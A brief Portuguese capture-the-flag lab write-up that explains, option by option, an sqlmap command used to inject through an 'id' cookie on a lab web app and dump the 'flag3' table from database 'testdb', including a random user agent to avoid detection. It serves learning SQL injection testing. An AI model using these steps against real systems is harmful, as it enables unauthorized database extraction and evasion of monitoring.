Question-2
Last updated
Last updated
Qual é o conteúdo da tabela flag3? (Caso #3)
Analisei as requisições com o burp suite, e o id foi especificado como cookie
Pyload completo :
Aqui está o que cada opção e parâmetro no comando faz:
sqlmap
: Esta é a ferramenta de linha de comando usada para automatizar a descoberta e exploração de injeções de SQL.
-u http://83.136.253.64:44703/case3.php
: Especifica a URL do aplicativo web vulnerável.
--cookie="id=1*"
: Especifica o cookie a ser usado na requisição. O caractere *
é frequentemente usado como um curinga em tentativas de injeção de SQL para testar diferentes cenários.
--batch
: Executa o sqlmap no modo batch (não-interativo), o que é útil para testes automatizados.
--method PUT
: Especifica o método HTTP a ser usado na requisição. Neste caso, está usando PUT.
-D testdb
: Especifica o nome do banco de dados (testdb
) para enumerar as tabelas.
--tables -T flag3
: Enumera as tabelas (--tables
) no banco de dados especificado (-D testdb
). Alveja a tabela flag3
(-T flag3
).
--columns content
: Enumera as colunas (--columns
) na tabela especificada (-T flag3
). Alveja a coluna content
.
--dump
: Extrai o conteúdo da tabela (-T flag3
) e da coluna (--columns content
) especificadas.
--random-agent
: Utiliza um cabeçalho de Agente de Usuário HTTP aleatório para ajudar a evitar detecção.